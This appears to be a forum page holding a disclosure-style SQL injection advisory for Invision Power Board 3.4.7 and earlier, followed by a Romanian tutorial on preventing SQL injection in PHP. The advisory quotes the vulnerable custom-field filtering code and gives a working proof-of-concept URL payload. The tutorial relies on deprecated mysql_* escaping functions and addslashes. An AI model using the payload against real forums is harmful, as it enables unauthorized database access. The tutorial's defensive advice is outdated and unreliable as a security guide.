Search the Community

# Exploit Title: Invision Power Board <= 3.4.7 SQL Injection # Date: 29.05.2015 # Exploit Author: ZeroDay # Software Link: http://www.invisionpower.com/ # Version: <= 3.4.7 # Tested on: 3.4.7 # About: For the G-Owl with Love vuln code admin/applications/members/modules_public/list/view.php //----------------------------------------- // Custom fields? //----------------------------------------- if ( count( $this->custom_fields->out_fields ) ) { foreach( $this->custom_fields->out_fields as $id => $data ) { if ( !empty($this->request[ 'field_' . $id ]) ) { $_queryPP = true; if( is_array($this->request[ 'field_' . $id ]) ) { foreach( $this->request[ 'field_' . $id ] as $k => $v ) { $this->request[ 'field_' . $id ][ $k ] = urldecode($v); $url['field_' . $id] = "field_{$id}[{$k}]=" . $v; } } else { $url['field_' . $id] = "field_{$id}=" . $this->request[ 'field_' . $id ]; $this->request[ 'field_' . $id ] = urldecode($this->request[ 'field_' . $id ]); } if( $this->custom_fields->cache_data[ $id ]['pf_type'] == 'drop' ) { $query[] = "p.field_{$id}='" . $this->request[ 'field_' . $id ] . "'"; } else if( $this->custom_fields->cache_data[ $id ]['pf_type'] == 'cbox' ) { if ( count( $this->request[ 'field_' . $id ] ) ) { if ( $this->custom_fields->cache_data[ $id ]['pf_search_type'] == 'loose' ) { $cboxFields = array(); foreach ( $this->request[ 'field_' . $id ] as $k => $v ) { $cboxFields[] = "p.field_{$id} LIKE '%|{$k}|%'"; } $query[] = "( " . implode( ' OR ', $cboxFields ) . " )"; } else { foreach ( $this->request[ 'field_' . $id ] as $k => $v ) { $query[] = "p.field_{$id} LIKE '%|{$k}|%'"; } } } } else { $query[] = $this->custom_fields->cache_data[ $id ]['pf_search_type'] == 'loose' ? "p.field_{$id} LIKE '%" . $this->request[ 'field_' . $id ] . "%'" : "p.field_{$id} = '" . $this->request[ 'field_' . $id ] . "'"; } } } } ...... POC index.php?/members/?field_1=admin%2525%2527%2Bor%2B1%253D1--%2B1 Source

1. Cum sa evitam SQL Injection (SQLi) De obicei acesta este folosit in linkuri de genul: site.tld/script.php?id=1 , adaugand dupa 1 o continuare a comanezii SQL. De exemplu: Code: (Select All) site.com/script.php?id=1 Acesta in cod arata cam asa: Code: (Select All) SELECT camp1,camp2 FROM tabel WHERE id=’1? Insa, putem adauga ceva acelui id, ceea ce va continua comanda noastra SQL: Code: (Select All) site.com/script.php?id=1’OR+id%3D’3? Asta, in codul SQL va arata asa: Code: (Select All) SELECT camp1,camp2 FROM tabel WHERE id=’1? OR id=’3? Bineinteles, acest exemplu nu este daunator, dar daca “hackerul” foloseste DROP sau DELETE, poate iesi urat. Cum se pot securiza acestea ? Simplu ! Aplicam stringului pe care il introducem in baza de date o functie, mysql_real_escape_string(), care inlocuieste toate caracterele care ar putea avea vreun efect asupra comenzii SQL. De exemplu: script.php Code: (Select All) $id = $_GET[‘id’]; $id = mysql_real_escape_string($id); $query = “SELECT camp1,camp2 FROM tabel WHERE id='”. $id .”‘”; Cel mai bine e sa luam toate datele in functie de ID (adica sa nu avem urluri gen useri.php?user=bogdan, ci useri.php?iduser=1) deoarece ID-uri, trebuie sa fie numere, lucru care se poate verifica foarte usor. Deci, datele le vom selecta dupa un anumit ID, care o sa fie numeric. Astfel, scriptul devine simplu: Code: $id = $_GET[‘id’]; if(!is_numeric($id)){ echo ‘ID-ul nu est numeric. Incercare de hacking ?? Politia a fost anuntata'; }else{ //este indicat sa verificati intai daca acel ID se afla in baza de date. folositi mysql_num_rows, iar daca rezultatul este 0, id-ul nu exista in baza de date //ceva de genul: $query = mysql_query(“SELECT camp1,camp2 FROM tabel WHERE id='”. $id .”‘”); if(mysql_num_rows($query)==0) { echo ‘ID-ul nu exista in baza de date. Anunt avocatul'; }else{ //totul e OK, id-ul e validat si exista in BD } } In principiu, pentru a valida un GET folositi urmatoarele 3 functii, in functie de caz: mysql_real_escape_string() – sau alternativa: addslashes() is_numeric() mysql_num_rows()